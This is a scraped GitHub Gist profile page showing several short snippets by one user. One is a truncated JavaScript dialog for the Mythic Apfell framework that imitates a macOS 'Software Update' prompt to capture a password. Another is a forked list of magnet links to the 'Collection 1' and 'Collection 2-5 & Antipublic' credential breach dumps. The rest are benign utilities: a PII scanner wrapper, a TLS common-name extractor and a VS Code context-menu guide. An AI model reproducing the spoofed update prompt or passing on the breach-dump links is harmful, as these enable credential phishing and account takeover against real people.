Skip to content

Instantly share code, notes, and snippets.

View jimmy-ly00's full-sized avatar

Jimmy jimmy-ly00

View GitHub Profile
@jimmy-ly00
jimmy-ly00 / prompt.js
Created June 26, 2021 02:48
Mythic Apfell manual prompt.js
function myprompt(){
var app = Application.currentApplication()
app.includeStandardAdditions = true
var dialogText = "An application needs permission to update"
var title = "Software Update"
var iconPath = "/System/Library/PreferencePanes/SoftwareUpdate.prefPane/Contents/Resources/SoftwareUpdate.icns"
try{
var prompt = app.displayDialog(dialogText, {
givingUpAfter: "300",
defaultAnswer: "",
@jimmy-ly00
jimmy-ly00 / pdscan_recursive.py
Last active June 14, 2022 14:58
Find PII (Personally Identifiable Information) using pdscan
import glob
from selectors import EpollSelector
import subprocess
# Change these
ROOT_DIR = "/home/jimmy/desktop/spam"
PDSCAN_FILE = "/home/jimmy/desktop/pdscan" # Download from https://github.com/ankane/pdscan#installation
for filename in glob.iglob(ROOT_DIR + '**/**', recursive=True):
result = subprocess.run([PDSCAN_FILE, "file://" + filename,"--show-data", "--show-all"], capture_output=True, text=True) # remove "--show-all" for high confidence results
@jimmy-ly00
jimmy-ly00 / extract_cn.py
Created February 8, 2024 14:18
Extract common name from TLS certificate via URLs
import ssl
import socket
from urllib.parse import urlparse
from cryptography import x509
from cryptography.hazmat.backends import default_backend
def get_certificate_common_name(url, timeout=3):
# Parse the URL to get the hostname
parsed_url = urlparse(url)
hostname = parsed_url.hostname
@jimmy-ly00
jimmy-ly00 / vscode-macos-context-menu.md
Created April 21, 2024 16:04 — forked from idleberg/vscode-macos-context-menu.md
“Open in Visual Studio Code” in macOS context-menu

Open in Visual Studio Code

  • Open Automator
  • Create a new document
  • Select Quick Action
  • Set “Service receives selected” to files or folders in any application
  • Add a Run Shell Script action
    • your default shell should already be selected, otherwise use /bin/zsh for macOS 10.15 (”Catalina”) or later
    • older versions of macOS use /bin/bash
  • if you're using something else, you probably know what to do 😉
@jimmy-ly00
jimmy-ly00 / breach.txt
Created May 20, 2024 21:31 — forked from fawazahmed0/breach.txt
Email and password breach collection list
# Please Note, I am sharing this, hoping this will be used for good public use, such as data analysis, penetration testing etc
# These links are already available all over the internet
# Also Note, Trying to login into someone else's account without their permission is unethical and illegal
# Collection 1
magnet:?xt=urn:btih:B39C603C7E18DB8262067C5926E7D5EA5D20E12E&dn=Collection%201&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce
# Collection 2-5 & Antipublic
magnet:?xt=urn:btih:D136B1ADDE531F38311FBF43FB96FC26DF1A34CD&dn=Collection%20%232-%235%20%26%20Antipublic&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce